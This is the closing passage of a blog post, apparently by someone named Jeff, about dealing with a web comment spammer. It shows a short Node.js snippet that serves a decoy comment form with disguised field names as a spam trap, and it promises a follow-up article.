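      '<input type="text" name="eml">' +                 // less obvious email field name
      '<input type="text" name="cmt" maxlength="40">' +  // constrained text box
      '<input type="submit"></form>'
    : '';
  res.end('<html><body>My humble site' + decoy + '</body></html>');
}).listen(80);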

So if all goes according to plan, I intend to post a follow-up to this aptly titled article in a few weeks. The follow-up will, of course, be entitled "Second encounters with a web comment spammer."

Until then!
- Jeff